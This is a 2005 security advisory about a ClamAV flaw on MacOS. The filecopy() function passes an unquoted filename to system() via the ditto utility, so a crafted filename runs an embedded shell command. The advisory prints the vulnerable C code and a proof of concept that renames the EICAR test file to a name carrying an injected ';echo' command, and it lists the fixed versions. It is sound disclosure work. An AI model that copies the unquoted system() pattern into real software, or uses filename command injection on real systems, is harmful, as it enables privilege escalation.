Sentinel Chicken Networks |
|
Sentinel Chicken Networks Security Advisory #04ClamAV: Local Privilege Escalation Vulnerability On MacOSReleased: May 27, 2005Table Of Contents
• Background BackgroundTaken from the Clam AntiVirus website[1]: "Clam AntiVirus is a GPL anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. Most importantly, the virus database is kept up to date." OverviewA vulnerability was discovered in ClamAV during a code audit. This vulnerability could allow a local attacker on a MacOS system to elevate privileges to that of a user running a ClamAV process. This problem affects ClamAV versions 0.80rc4 through 0.84rc2, and is fixed in versions 0.84 and later. DetailsUnder the Mac OS file system (HFS) files are saved as to parts data and resource fork. In ClamAV version 0.80rc4, support was added to copy both the data and the resource fork when moving a virus infected file. The mechanism they used was the Mac local system utility ditto. While there isn't a security issue with using the "ditto" command itself, the system() call they use to execute it is insecure. From the function filecopy(), in the file shared/misc.c: ... #ifdef C_DARWIN /* On Mac OS X use ditto and copy resource fork, too. */ char *ditto = (char *) mcalloc(strlen(src) + strlen(dest) + 30, sizeof(char)); sprintf(ditto, "/usr/bin/ditto --rsrc %s %s", src, dest); if(system(ditto)) { free(ditto); return -1; } ... This code does not check the filename for shell special characters, or quote existing ones. If a file name contains an embedded shell command the system() will execute it as the ClamAV current UID. An example attack is as follows: Download a test virus $ mv eicar.com \;echo\ "test"\; If the clam user does not have permissions to remove the file it will try and copy the file and the resource fork via the ditto system call. The command it will execute in this case is: system("/usr/bin/ditto -rsrc ;echo "test"; /tmp/;echo "test" "); The shell will interpret the ';echo "test";' as a separate command and execute it. The following is some sample output: $ sudo -u nobody clamscan . --debug --move=/tmp ... LibClamAV debug: Eicar-Test-Signature found in descriptor 6. ./;echo "test";: Eicar-Test-Signature FOUND usage: ditto [ <options> ] src [ ... src ] dst <options> are any of: -v print a line of status for each src copied -V print a line of status for every file copied -X do not descend into directories with a different device ID -c create a CPIO archive at dst -x unpack the CPIO archives at src... -z CPIO archives are compressed -k archives are PKZip format --keepParent parent directory of src is embedded in dst --arch archVal fat files will be thinned to specified archVal multiple -arch options can be specified archVal should be one of "ppc", "i386", etc --bom bomFile only files present in the specified bom are copied --rsrc copy preserving resource data --sequesterRsrc copy resources via polite directory (PKZip only) test ... The usage statement above is produced because in this case, ditto's call doesn't have the correct command line options. Afterward, "test" is printed, as expected. Mitigating FactorsThe conditions under which this can be exploited are very limited. A ClamAV process must be configured to move files to a quarantine in order for the ditto call to be used. In addition, this call only appears to be used if a file move operation fails, at which point the file is then copied. Once again, due to the #ifdef used in the affected function, only MacOS installations are affected. Disclosure Timeline
2005-03-31 Initial Discovery CreditsDiscovered by: References
This advisory is intended for educational use only. It is the sincere hope of the author(s) that this information will help protect the public from the vulnerability discussed. Where possible, the author(s) has made a reasonable effort to contact vendors and release only after patches/work-arounds are made available. The author(s) will not take responsibility for any possible negative effects of its dissemination. |
Content on this page, unless otherwise indicated, is © 2002-2010 Sentinel Chicken Networks. Reproduction is authorized under our terms. |
|
printer friendly Also available in IPv6. |
|